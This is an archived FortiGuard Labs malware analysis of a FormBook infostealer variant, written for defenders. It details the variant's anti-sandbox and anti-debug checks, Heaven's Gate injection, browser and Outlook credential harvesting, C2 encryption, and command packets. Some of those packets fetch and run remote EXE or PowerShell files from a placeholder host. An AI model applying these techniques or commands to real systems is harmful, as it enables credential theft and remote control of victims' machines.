{
	"id": "72ec91cd-9286-40ec-bc1b-2ad751cf2b93",
	"created_at": "2026-04-06T00:12:45.721023Z",
	"updated_at": "2026-04-10T03:37:08.626798Z",
	"deleted_at": null,
	"sha1_hash": "6f152f291107aa70fae888d111633b34ed37ff8c",
	"title": "Infostealer Malware FormBook Spread via Phishing Campaign – Part II | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 11304568,
	"plain_text": "Infostealer Malware FormBook Spread via Phishing Campaign –\r\nPart II | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2025-05-27 · Archived: 2026-04-05 14:50:20 UTC\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Fully remotely control the victim’s computer\r\nSeverity level: High\r\nBackground\r\nThis is part II of the FormBook analysis blog. In the previous post (Part I), I covered the campaign’s initialization\r\nvia a phishing email, the CVE-2017-11882 vulnerability it exploited to execute an extracted 64-bit DLL, and the\r\ndownload and decryption of a FormBook variant hidden in a fake PNG file. Finally, I elaborated on how the 64-bit\r\nDLL mapped the FormBook payload in a target process (ImagingDevices.exe) and executed it using the process\r\nhollowing technique.\r\nIn the second part of this analysis, you will learn how the FormBook payload operates on a comprised machine,\r\nincluding the complicated anti-analysis techniques employed by this FormBook variant, how the FormBook\r\nleverages Heaven’s Gate and randomly selected processes to evade analysis by cybersecurity researchers, the\r\nsensitive data it collects from the victim’s machine, how it communicates with the C2 server, and how it controls\r\nthe victim’s system with control commands.\r\nFormBook Analysis - Part II\r\nFormBook Execution inside ImagingDevices.exe\r\nThe FormBook payload is a 32-bit executable that runs inside the 32-bit target process “ImagingDevices.exe”.\r\nMy analysis reveals that the copied FormBook is re-encrypted. The code initially executed does not belong to the\r\nreal FormBook but instead serves as a decryption routine. 
The encrypted data begins at offset 0x6E36C3 (with\r\nFormBook loaded at 0x6E0000), and the encrypted data size is hard coded to 0x43600, as illustrated in Figure 1.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 1 of 29\n\nFigure 1: Calling a function to decrypt the FormBook payload\r\nNext, it calculates the real entry point address from the decrypted code and stores it in the ESI register. This\r\naddress will be called at the final stage, as shown in Figure 2.\r\nFigure 2: Ready to call the real entry point function via ESI\r\nAnti-Analysis Techniques\r\nFormBook leverages multiple techniques to prevent being analyzed. I explain the main techniques used in this\r\nvariant below.\r\nDuplicated Ntdll.dll\r\nFormBook loads and deploys a duplicated ntdll.dll in its memory. Whenever it calls APIs from Ntdll.dll, it\r\ncalls the address inside the duplicated ntdll.dll. As a result, FormBook becomes more complex to analyze,\r\nand researchers may be confused about what the API does. Figure 3 shows the memory tab where both\r\nntdll.dll instances are loaded.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 2 of 29\n\nFigure 3: Display of both the default Ntdll.dll and the duplicated Ntdll.dll in memory\r\nFigure 4 shows how it calls the ZwOpenDirectoryObject() API (0x2FE3580) inside the duplicated ntdll.dll. In my\r\nanalysis environment, the original address for the API should be 0x76F43580.\r\nFigure 4: Calling the ZwOpenDirectoryObject() API in the duplicated Ntdll.dll\r\nWindows System Modules and API Obfuscation\r\nWindows modules and APIs are obfuscated and dynamically resolved before being called. In Figure 5, we\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 3 of 29\n\ncan examine the entire process of obtaining an API. 
First, it decrypts the module name (“user32.dll”) by an\r\nindex (0xB).\r\nThis is a module list loaded dynamically by FormBook by their index.\r\nIndex Module Name\r\n0x1 \"kernel32.dll\"\r\n0x2 \"advapi32.dll\"\r\n0x3 \"ws2_32.dll\"\r\n0x4 \"rstrtmgr.dll\"\r\n0x5 \"sqlite3.dll\"\r\n0x6 \"winsqlite3.dll\"\r\n0x7 \"crypt32.dll\"\r\n0x8 \"vaultcli.dll\"\r\n0x9 \"ole32.dll\"\r\n0xA \"nss3.dll\"\r\n0xB \"user32.dll\"\r\n0xC \"shell32.dll\"\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 4 of 29\n\nFormBook then passes the decrypted module name to a function to load it using a low-level Windows API\r\nfunction, LdrLoadDll().\r\nFigure 5: The process of resolving the PostThreadMessageW() API\r\nThe desired Windows APIs are not hardcoded strings in FormBook but encrypted hash codes. FormBook traverses\r\nthe APIs inside the loaded modules and matches their hash codes with the decrypted ones to find the desired APIs.\r\nAs you can see in Figure 5, the PostThreadMessageW() API was obtained inside the EAX register from the\r\n“user32.dll” module.\r\nKey Functions Dynamically Decrypted\r\nIn this variant of FormBook, more than 100 key functions are encrypted by default and are decrypted only before\r\ncalling. They are then re-encrypted after calling, which presents a challenge for static analysis.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 5 of 29\n\nFigure 6: Overview of the code structure used to dynamically decrypt a function\r\nAs shown on the left side of Figure 6, the SearchDecryptCode() function is called to search the encrypted code by\r\nlocating the given start magic (6 bytes) and end magic (6 bytes). It then decrypts the located code.\r\nAt 0x709B15, it calls sub_70DC33(), whose body is shown on the right side. 
The instructions enclosed by the red\r\nrectangle were just decrypted.\r\nAfter executing the dynamic function (sub_70DC33()), it calls ReEncryptCode(), at 0x709B26, to re-encrypt the\r\nfunction.\r\nAnti-Sandbox\r\nTo protect FormBook from being analyzed by auto-analysis platforms, it performs multiple detections.\r\n1. Virtual Machines and Analysis Tools\r\nFormBook contains a predefined blacklist of encrypted hash codes, which are generated from process names\r\nassociated with popular VM platforms or analysis tools, such as VMware (vmwareuser.exe, vmwareservice.exe),\r\nSandboxie (sandboxiedcomlaunch.exe, sandboxierpcss.exe), Sysinternals tools (procmon.exe, regmon.exe,\r\nfilemon.exe), network sniffers (wireshark.exe, netmon.exe), automation scripts (python.exe, perl.exe), and more.\r\nIt retrieves all active processes from the victim’s system, generates a hash code from their process names, and\r\ncompares them with a predefined set of blacklisted hash codes.\r\nThe following code snippet demonstrates how it decrypts a hash code from 0x72FE2A27, which is 0x3EBE9086\r\ngenerated from “vmwareuser.exe”.\r\n……\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 6 of 29\n\n006F642A    lea   ecx, [ebp+Dest] ; Current process name.\r\n006F6430    push  ecx\r\n006F6431    push 3Ah           ; Decryption key.\r\n006F6433    push 72FE2A27h     ; Encrypted hash code.\r\n006F6438    call   decrypt_fun   ; Decrypts a hash code.\r\n006F643D    add  esp, 8\r\n006F6440    push eax    ; EAX holds the decrypted hash code, 0x3EBE9086, which is generated from\r\n“vmwareuser.exe”.\r\n006F6441    call   match_hashcode ; Compares with the current process.\r\n006F6446    add  esp, 8\r\n006F6449    test eax, eax\r\n006F644B    jnz analysis_detected\r\n……\r\nOnce matched, it sets a global flag indicating it’s running in an analysis environment.\r\n2. 
Detecting Sandbox Environments\r\nSome auto-analysis sandboxes run the target process from specific folders. FormBook detects this by retrieving\r\nthe full path of the target process it hollowed into. In my analysis machine, it’s:\r\n“C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe”.\r\nIt then checks if the parent folder contains keywords from a blacklist by matching their hash codes. Examples\r\ninclude:\r\n“\\cuckoo\\”, “\\sandcastle\\”, “\\aswsnx\\”, “\\sandbox\\”, “\\smpdir\\”, “\\samroot\\”, and “\\avctestsuite\\”\r\nBelow is an example of full path triggers detection:\r\n“C:\\cuckoo\\Windows Photo Viewer\\ImagingDevices.exe”\r\n3. Windows Account Name\r\nIt calls the Windows API RtlQueryEnvironmentVariable_U() with “USERNAME” as the variable name to retrieve\r\nthe victim’s username. Figure 7 demonstrates the retrieved username after calling the API.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 7 of 29\n\nFigure 7: Retrieving the username “win-10”\r\nIt then generates a hash code from the username and compares it with those in a blacklist. FormBook assumes the\r\nusernames starting with certain patterns (e.g., “cuckoo”, “sandbox-“, “nmsdbox-“, and more) belong to auto-analysis systems.\r\nAll of the above detection results are stored in global flags. FormBook checks these flags in a function and exits\r\nthe process if any of them is set.\r\nAnti-Debug\r\nIt checks if a kernel-mode debugger (like Windbg) is enabled by calling the API NtQuerySystemInformation()\r\nwith SystemKernelDebuggerInformation(0x23) system information class. 
Refer to Figure 8 for more details.\r\nFigure 8: Checking for a kernel debugger\r\nIf the KernelDebuggerEnabled is 1, it means a kernel debugger is present.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 8 of 29\n\nIt also determines if the user-mode debugger is present by passing ProcessDebugPort (0x7) as a\r\nProcessInformationClass parameter to the ZwQueryInformationProcess() API. It returns 0xFFFFFFFF if a user-mode debugger is attached, such as x32dbg, which I used during the analysis.\r\nHeaven’s Gate Technique\r\nThe Heaven’s Gate technique is a mechanism on Windows x64 systems that allows switching from 32-bit to 64-bit\r\ncode inside a 32-bit process. It is also known as WoW64 (Windows-on-Windows 64-bit).\r\nThis transition is the essence of “Heaven’s Gate.” The mechanism presents a significant challenge to cybersecurity\r\nresearchers because a 32-bit debugger cannot debug 64-bit code, interrupting the debugging process.\r\nThe Windows x64 architecture determines the execution mode based on the CS (Code Segment) register. In user\r\nmode (ring 3), 0x23 corresponds to the 32-bit code segment, while 0x33 corresponds to the 64-bit code segment.\r\nExecuting an instruction like “jmp far 0x33:{address}” in a 32-bit process switches to 64-bit mode and executes\r\n64-bit code from the {address}.\r\nThis variant of FormBook uses the Heaven’s Gate technique multiple times, which will be explained in the\r\nfollowing sections.\r\nRandom Process Selection\r\nFormBook randomly selects one of the explorer.exe child processes from active processes and leverages the\r\nHeaven’s Gate technique to manipulate the selected process.\r\nThe malware first calls the NtQuerySystemInformation() API with the SystemProcessInformation (0x5) parameter\r\nto enumerate all active processes. 
It locates the PID (Process ID) of explorer.exe by comparing process name hash\r\ncodes.\r\nNext, it scans the active processes to randomly choose a child process of explorer.exe by matching the active\r\nprocesses’ PPID (Parent Process ID) with the explorer.exe’s PID (Figure 9).\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 9 of 29\n\nFigure 9: How FormBook selects a child process of explorer.exe\r\nAfter obtaining the process handle of the selected process (e.g., notepad.exe) by calling the NtOpenProcess() API,\r\nFormBook creates a shared memory between the two processes and copies the shellcode:\r\n1. Creates a shared memory section (via ZwCreateSection()).\r\n2. Maps it to both the target and current process (via NtMapViewOfSection()).\r\n3. Copies of the shellcode are added to the target process through this shared memory.\r\nIt then utilizes the Heaven’s Gate technique to execute a piece of 64-bit code that had been copied and deployed in\r\na newly allocated buffer.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 10 of 29\n\nFigure 10: The Heaven’s Gate Invocation\r\nFigure 10 is about to execute “jmp far 33:2F30000”, where 0x33 is the new CS and 0x2F30000 is the new buffer’s\r\naddress with the copied 64-bit code, as shown in the memory.\r\nUpon completion, it returns to 23:7107C0, which has already been pushed onto the top of the stack.\r\n64-bit Code Execution for Process Control\r\nMy analysis reveals that the 64-bit code takes control of the selected process’s main thread (like notepad.exe) to\r\nexecute a piece of injected malicious code.\r\nTo control the selected process, it calls the NtOpenProcess() and ZwQueryInformationProcess() APIs to retrieve\r\nthe process’ details.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 11 of 29\n\nThe APIs 
ZwOpenThread() and ZwSuspendThread() are called to pass the selected process’ information to\r\nsuspend the main thread inside the selected process. In Figure 11, we can see that the 64-bit code just called\r\nZwSuspendThread(), and in another debugger attached to the chosen process, it displays the suspended main\r\nthread.\r\nFigure 11: The main thread has just been suspended\r\nSubsequently, the 64-bit code copies the malicious payload into the selected process over the shared memory. It\r\nthen calls NtGetContextThread() and NtSetContextThread() to modify the RIP register, redirecting the execution\r\nto the injected code.\r\nFinally, it calls the NtResumeThread() API to resume the main thread, causing the malicious code to run inside the\r\nselected process, notepad.exe. Execution then returns to the 32-bit code by executing a “retf” instruction.\r\nDiving into the Malicious Code Running in a Selected Process\r\nThis time, the selected child process of explorer.exe is a Notepad.exe with the PID 9560.\r\nThe copied malicious code is the same as the 64-bit code mentioned earlier, but it goes down different code\r\nbranches depending on a returned flag.\r\nTwelve encrypted process names are saved in local variables, which can be obtained using a function with a string\r\nindex. The table below lists all the processes and indexes.\r\nString Index Process Names\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 12 of 29\n\n0x0 \"PATHPING.EXE\"\r\n0x1 \"fontview.exe\"\r\n0x2 \"MuiUnattend.exe\"\r\n0x3 \"forfiles.exe\"\r\n0x4 \"chkntfs.exe\"\r\n0x5 \"find.exe\"\r\n0x6 \"DpiScaling.exe\"\r\n0x7 \"waitfor.exe\"\r\n0x8 \"net.exe\"\r\n0x9 \"icsunattend.exe\"\r\n0xa \"cttune.exe\"\r\n0xb \"whoami.exe\"\r\nThese 32-bit processes all reside in the “C:\\Windows\\SysWOW64\\” folder. FormBook repeatedly launches these\r\nprocesses in a loop until one is successfully created. 
It then performs process hollowing on the process, injects the\r\nFormBook payload into the process (such as “PATHPING.EXE”), and executes it.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 13 of 29\n\nFigure 12: Creation of a suspended process\r\nAs shown in Figure 12, it is about to call the CreateProcessInternalW() API to create a PATHPING.EXE process,\r\nwith the dwCreationFlags parameter set to 0x800000C, indicating a suspended process will be created.\r\nFigure 13: Process tree view of the created PATHPING.EXE\r\nIt then creates a shared memory section between notepad.exe and PATHPING.EXE. At this point, the task of the\r\ncode running in the selected process (notepad.exe) is completed.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 14 of 29\n\nSwitching to the target process (ImagingDevices.exe), it returns to the 32-bit code mode from the 64-bit code via\r\nHeaven’s Gate. It brings the full process information of the newly created PATHPING.EXE process using the\r\nshared memory established between it and the selected notepad.exe process.\r\nImagingDevices.exe takes control of the PATHPING.EXE process and copies the FormBook payload into the\r\nPATHPING.EXE process via the shared memory section. As shown in Figure 14, the payload is encrypted and\r\nmapped into both processes’ memory, having been written by code running inside ImagingDevices.exe.\r\nFigure 14: Shared memory section mapped into both processes with the FormBook payload\r\nNext, ImagingDevices.exe calls the NtSetContextThread() API to modify the PATHPING.EXE’s EAX register\r\n(which holds a thread function address to RtlUserThreadStart().) 
to redirect the execution to a specific function.\r\nThis function decrypts the FormBook payload and calls the entry point function of the FormBook payload once\r\nthe NtResumeThread() API is called.\r\nA Look into the FormBook Payload\r\nAfter employing numerous evasion techniques, FormBook finally hits the main payload within the\r\nPATHPING.EXE process, another 32-bit process.\r\nBased on my analysis, this process function acts as a dashboard program for FormBook. It gathers sensitive data\r\nfrom the victim’s system and manipulates another selected process to communicate with its C2 server.\r\nCollecting Basic Information\r\nFormBook collects basic information from the victim’s device, such as the Windows product name, the current\r\nbuild, the username, and the computer name. Some are obtained from the system registry via API calls, while\r\nothers are retrieved using the RtlQueryEnvironmentVariable_U() API. This information is then encrypted and\r\nsaved in a global variable, which is later sent to the C2 server in an HTTP GET packet to register the infected\r\nsystem.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 15 of 29\n\nFigure 15: Encrypting basic system information\r\nAs shown in Figure 15, the malware prepares to encrypt the collected basic information, where “XLNG…” is a\r\nmagic string, “Windows 10 Enterprise x64” is the Windows product information, followed by the Base64-encoded\r\ncomputer name and user name.\r\nBuilding a Socket Process\r\nFormBook then randomly selects another child process of explorer.exe. 
Similar to what was done in the\r\nImagingDevices.exe process, it invokes 64-bit code from the 32-bit process using the Heaven’s Gate technique.\r\nThis 64-bit code copies and deploys the FormBook into the newly selected process (e.g., another notepad.exe\r\nprocess) and modifies the RIP register to point to the deployed FormBook at a different entry point.\r\nAccording to my analysis, this newly selected process acts as a socket process responsible for communicating\r\nwith the C2 server. A large shared memory section is created and mapped into PATHING.EXE and the chosen data\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 16 of 29\n\nexchange process.\r\nFigure 16: Sending WM_COMMAND to the newly selected process.\r\nWhen it returns to 32-bit mode (using Heaven’s Gate) in the PATHPING.EXE process, FormBook calls the\r\nPostThreadMessageW() API with a Msg parameter of 0x111 (WM_COMMAND) to send a message to the main\r\nthread of the selected process (like notepad.exe), as shown in Figure 16.\r\nInstead of calling NtResumeThread() to resume thread execution, FormBook sends a Windows message to\r\nactivate the payload. Why does it send a message to run the FormBook as a socket process?\r\nAs we know, most Windows programs are driven by Windows messages. Most of the time, a program remains idle\r\nbecause the message queue is empty—there is no user interaction (mouse, keyboard, etc.), system events, or other\r\nmessages. The program waits (blocked by the NtUserGetMessage() API) until a new message arrives.\r\nIf FormBook modifies the value of the RIP register to point to the copied FormBook payload and then proactively\r\nsends a message to the process, it can then hijack the original execution flow and redirect it to run the FormBook\r\npayload instead.\r\nThe FormBook instance in PATHPING.EXE also acts as a daemon, monitoring the socket process. 
Once the\r\nvictim terminates the socket process, FormBook immediately selects another child process of explorer.exe to take\r\nits place.\r\nSensitive Data Collection\r\nThe FormBook instance running in PATHPING.EXE harvests sensitive data from the compromised system, such\r\nas saved credentials of various software, autofill data, cookies, proxy settings for browsers, and data from the\r\nsystem clipboard.\r\nFormBook can also obtain sensitive data from multiple resources, such as the system registry and the local profile\r\nfiles.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 17 of 29\n\nFor example, it extracts the autofill data for the IE browser from the key path\r\n“HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2” in the system registry.\r\nIt also collects email account information from Outlook by scanning the following key paths in the system registry\r\nto cover multiple Outlook versions:\r\nHKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging\r\nSubsystem\\Profiles\\Outlook\\\r\nHKCU\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\\r\nHKCU\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\\r\nWhen gathering sensitive data from Chrome, FormBook accesses some SQLite database format files located in\r\n“%LocalData%\\Google\\Chrome\\User Data\\Login Data\\Default\\”, explicitly targeting these files: “Login Data”\r\n(credentials), “Cookies” (web site cookies), “Web Data” (autofill), and “Network” (proxy setting).\r\nThis is accomplished through a series of winsqlite3.dll API calls, including sqlite3_open(), sqlite3_prepare_v2(),\r\nsqlite3_step(), sqlite3_column_text(), sqlite3_column_blob(), sqlite3_column_bytes(), and sqlite3_close().\r\nFigure 17: A display of obtained credentials saved for Chrome\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 18 
of 29\n\nFigure 17 demonstrates Chrome credential extraction, showing FormBook executing the SQL query “SELECT\r\norigin_url, username_value, password_value FROM logins” via the sqlite3_prepare_v2() API.\r\nThe sample credentials, shown at the bottom, were just obtained from a Chrome browser in a test environment.\r\nThe malware maintains the capability to collect similar sensitive data from a wide range of additional applications.\r\nBelow are the categorized software applications from which FormBook can collect sensitive data:\r\nEmail Clients:\r\nOutlook, Thunderbird, and Foxmail.\r\nWeb Browsers:\r\nInternet Explorer, Chrome, Firefox, Edge, Brave-Browser, Opera Neon, ChromePlus, Avast Secure Browser,\r\nYandex Browser, Citrio, Sleipnir 5, Epic Privacy Browser, Elements Browser, 360 Chrome, CCleaner Browser,\r\nSputnik, Cốc Cốc Browser, Opera, Uran, Coowon Browser, Comodo Dragon, AVG Secure Browser, CentBrowser,\r\n7Star Browser, UR Browser, SalamWeb, QIP Surf, Chromium, Iridium Browser, Slimjet, Vivaldi, Orbitum,\r\nLiebao, Kometa Browser, Chedot, Torch Browser, Amigo, Kinza, and Blisk,\r\nCommunicating with the C2 Server\r\nLet’s now examine the socket process (another selected process, like notepad.exe) that handles communication\r\nwith the Command-and-Control (C2) server in the background.\r\nThe C2 domain list in this variant of FormBook is not stored in plaintext. Instead, it undergoes a multi-layered\r\nobfuscation process. Each domain is encrypted, encoded using Base64, and then encrypted again.\r\nThis technique adds significant complexity to static analysis and helps evade detection. This variant has 64 C2\r\ndomains, which are dynamically retrieved in the socket process by referencing a one-byte index. The decrypted\r\ndomains only exist temporarily in memory during runtime, making them more elusive. 
For the complete list of C2\r\ndomains, refer to the IOCs section at the end of this report.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 19 of 29\n\nFigure 18: Decrypted C2 server domain\r\nFigure 18 shows the socket process after successfully decrypting a C2 server domain from memory. The decrypted\r\ndomain is “www[.]manicure-nano[.]sbs,” corresponding to index 0x2B, with the associated URL “/xkx8/”.\r\nA shared memory section is created between PATHPING.EXE and the socket process (like notepad.exe), which is\r\nused to share:\r\nSensitive data collected by FormBook within PATHPING.EXE\r\nPacket data received from the C2 server.\r\nVarious flag variables used to signal actions to the two FormBooks instances, such as data ready to send,\r\nC2 packet received, etc.\r\nAnother responsibility of the socket process is to gather system clipboard data. FormBook performs this by\r\nrunning a thread calling the relevant APIs: OpenClipboard(), GetClipboardData(), GlobalLock(), GlobalUnlock(),\r\nand CloseClipboard(). The collected clipboard data is also stored in shared memory.\r\nWithin the socket process, FormBook starts a specific thread to repeatedly check if a flag is set by\r\nPATHPING.EXE that tells if the collected data is ready to send. Once the flag is triggered, FormBook transmits\r\nthe collected data using HTTP GET and POST. 
Based on my analysis, basic system information is sent via GET,\r\nand other data is sent via POST.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 20 of 29\n\nFigure 19: Encrypting collected data before sending to the C2 server\r\nAs shown in Figure 19, execution breaks at a function call (located at 0x1F08625B1D1) that is responsible for\r\nencrypting collected credentials—retrieved from Mozilla Firefox in this instance—in the memory dump before\r\nsending them to the C2 server.\r\nTo evade detection during transmission, FormBook encrypts and encodes the data before sending it out. Each C2\r\nserver has its own unique 0x14-byte-long encryption key seed hardcoded in memory. The data undergoes two\r\nlayers of encryption. It first uses a common predefined key to encrypt the data, then uses the C2 server’s own\r\nencryption key to encrypt it again. After this double encryption, FormBook encodes the data using the standard\r\nbase64 algorithm. \r\nFigure 20 shows a screenshot of an HTTP Post packet in Wireshark, illustrating how FormBook sends collected\r\ndata to a C2 server.\r\nThe URL in this case is www[.]grcgrg[.]net/jxyu/. The encrypted data is located in the body portion of the POST\r\nrequest, prefixed with a randomly generated string, “30J0cVz=”.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 21 of 29\n\nFigure 20: Sending collected data via HTTP POST\r\nControl Commands\r\nAs mentioned before, when the socket process receives a command packet from the C2 server, it saves it in shared\r\nmemory and sets a corresponding flag. This informs the FormBook instance running in the PATHPING.EXE to\r\nprocess the C2 command.\r\nAll incoming packets from the C2 server are multi-layer encrypted and Base64-encoded. 
Once received, the\r\nPATHPING.EXE instance decrypts and decodes the packets before interpretation.\r\nA decrypted packet format looks like this:\r\n“XLNG{command ID}{command data}{XLNG}”\r\nThe “XLNG” prefix string is a magic marker. All C2 command packets must start with it. Otherwise, the\r\npacket will be discarded.\r\nThe subsequent one-byte value is the command ID, which ranges from ‘1’ to ‘9’ (0x31- 0x39).\r\nThe following portion is the command data.\r\nThe last “XLNG” is an optional end marker, required only by the commands ‘1’, ‘2’, ‘4’, and ‘9’.\r\nFormBook Control Commands:\r\n1.     ‘1’ – 0x31:\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 22 of 29\n\nThis command delivers three kinds of executable files within the packet: *.dll, *.ps1, and *.exe. Once this\r\ncommand is received, FormBook saves the file into the system %temp% directory and then executes it on the\r\nvictim’s system.\r\n2.     ‘2’ – 0x32:\r\nThis command can be used to update the FormBook or execute other malware.\r\nFormBook receives a 32-bit EXE file in the packet and saves it into a randomly generated temp file within the\r\nsystem. After that, it executes the EXE file by invoking the CreateProcessInternalW() API. As shown in Figure 21,\r\nit just wrote the 32-bit EXE data into a temp file, such as “%temp%\\yzbtfb3.exe.”\r\nFigure 21: FormBook just wrote a received EXE file into a temp file\r\nIt finally calls ExitProcess() to exit the current FormBook process (PATHPING.EXE).\r\n3.     ‘3’ – 0x33:\r\nThis command is used to remove FormBook from the victim’s system.\r\nIt deletes Formbook's file and Auto-run items from the system registry and exits the current FormBook instance.\r\nIt also restarts the Explorer.exe process.\r\n4.     ‘4’ – 0x34:\r\nWhen FormBook receives this command, it downloads an executable file from a given URL that comes with the\r\npacket if a subcommand is provided. 
Otherwise, it only executes a given command.\r\nThis variant of FormBook provides two sub-commands:\r\n“RMTD”: Downloads and executes an EXE file.\r\n“RMTU”: Downloads and runs a PowerShell file.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 23 of 29\n\nBelow are three cases that demonstrate how the ‘4’ command works.\r\nWithout sub-command:\r\nXLNG4cmd.exeXLNG\r\nRMTD sub-command:\r\nXLNG4RMTD:http://test.com/test.exeXLNG\r\nRMTU sub-command:\r\nXLNG4RMTU:http://test.com/test.ps1XLNG\r\nFormBook downloads the file into a randomly named file under the system’s %temp% folder. It calls a series of\r\nAPIs to do so, such as InternetOpenW(), InternetConnectW(), HttpOpenRequestW(), HttpSendRequestW(),\r\nInternetQueryDataAvailable(), and InternetReadFile().\r\nFinally, FormBook calls ShellExecuteA to execute the downloaded file in the compromised system.\r\nIf no sub-commend is provided in the command data, it means the command data is not a URL, which can be\r\nexecuted directly by calling the ShellExecuteA() API.\r\nFigure 22 provides an example with a simulated control command packet, which was about to call an API to\r\nlaunch “C:\\Windows\\system32\\mspaint.exe”.\r\nFigure 22: Example of the ‘4’ command without sub-commands\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 24 of 29\n\n5.     ‘5’ – 0x35:\r\nThis command allows FormBook to clean sensitive data saved on the victim's browsers, such as cookies,\r\ncredentials, and more.\r\nIt also deletes some folders and files from the compromised system by calling the SHFileOperationW() API. 
The\r\naffected paths are:\r\n• \"%WinDir%\\Cookies\"\r\n• \"%AppData%\\Microsoft\\Windows\\Cookies\"\r\n• \"%AppData%\\Microsoft\\Windows\\Cookies\\Low\"\r\n• \"%LocalAppData%\\Microsoft\\Windows\\INetCookies\"\r\n• \"%LocalAppData%\\Microsoft\\Windows\\INetCookies\\Low\"\r\n• \"%LocalAppData%\\Google\\Chrome\\User Data\\Default\\Login Data\"\r\n• \"%LocalAppData%\\Google\\Chrome\\User Data\\Default\\Cookies\"\r\n• \"%LocalAppData%\\Google\\Chrome\\User Data\\Default\\Current Session\"\r\n• \"%APPDATA%\\Mozilla\\Firefox\\Profiles\\{ProfileName}\\Cookies.sqlite\"\r\n6.     ‘6’ – 0x36:\r\nThis command instructs FormBook to collect sensitive data that will be sent to the C2 server, as explained in the\r\n“Collect Sensitive Data” section above.\r\n7.     ‘7’ – 0x37:\r\nReboots the victim’s device.\r\nFormbook calls the API ExitWindowsEx() with the EWX_FORCEIFHUNG | EWX_REBOOT parameter to\r\nreboot the system.\r\n8.     ‘8’ – 0x38:\r\nPowers off the victim’s device.\r\nFormbook calls the API ExitWindowsEx() with the EWX_FORCEIFHUNG | EWX_POWEROFF parameter to\r\npower off the system.\r\n9.     ‘9’ – 0x39:\r\nIn this variant, the command corresponds to an empty function.\r\nSummary\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 25 of 29\n\nFigure 23: Diagram illustrating the overall workflow of the FormBook payload\r\nIn this second part of the FormBook blog series, I explained how the FormBook payload operates within the 32-\r\nbit target process, “ImagingDevices.exe.” Figure 23 provides an overview of the entire workflow executed by the\r\npayload. 
I also showed the various complicated anti-analysis techniques used by this FormBook variant, including\r\n—but not limited to—a hidden ntdll.dll module, API obfuscation, more than 100 encrypted key functions, anti-sandbox techniques, anti-debugging, and the repeated use of Heaven’s Gate techniques.\r\nI then explained how FormBook randomly selects a process from active processes and takes control of it using the\r\nHeaven’s Gate technique. Its main objective is to perform process hollowing on the selected process (say\r\nPATHPING.EXE), inject FormBook into the process, and execute it as a dashboard.\r\nOnce running, FormBook collects a wide range of sensitive data from the victim’s system, including, but not\r\nlimited to, basic system information, saved credentials, cookie data, autofill data, browser history, and more.\r\nNext, I described how the C2 server list in this FormBook variant is decrypted and decoded, and how stolen\r\nsensitive data is formatted and transmitted in network packets.\r\nFinally, I examined FormBook’s nine control commands, which enable a wide array of capabilities, such as\r\nexecuting provided executable files, launching an existing file, downloading and executing EXE, DLL, and PS1\r\nfiles, and remotely rebooting or shutting down the victim’s machine.\r\nFortinet Protections\r\nFortinet customers are already protected from this campaign with FortiGuard’s AntiSPAM, Web Filtering, IPS,\r\nand AntiVirus services as follows:\r\nThe FortiGuard Anti-Botnet Service has blocked the DNS requests for accessing FormBook’s C2 server.\r\nThe C2 server list is rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard\r\nAntiVirus engine is part of each solution. 
